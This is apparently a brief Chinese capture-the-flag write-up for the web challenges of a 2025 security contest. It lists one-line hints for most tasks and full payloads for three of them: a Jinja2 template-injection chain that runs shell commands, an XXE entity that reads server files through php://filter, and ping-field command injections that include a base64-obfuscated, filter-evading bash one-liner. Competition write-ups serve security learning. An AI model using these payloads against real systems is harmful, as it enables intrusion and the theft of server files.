2025春秋杯网络安全联赛冬季赛

web

HyperNode

文件读取+目录穿越

Static_Secret

目录穿越

Dev’s Regret

git泄露

Session_Leak


修改这里的testuser为admin

My_Hidden_Profile

直接/login登录即可

EZSQL


Hello User

1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()") }}{% endif %}{% endfor %}

RSS_Parser

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY a SYSTEM "php://filter/read=convert.base64-encode/resource=file:///index.php">
]>
<root>
<username>&a;</username>
<password>1</password>
</root>


Server_Monitor

ping命令执行拼接

非预期

;env

预期?


;echo${IFS}"Y2F0IC9mbGFn"|ba\se64${IFS}-d|bas\h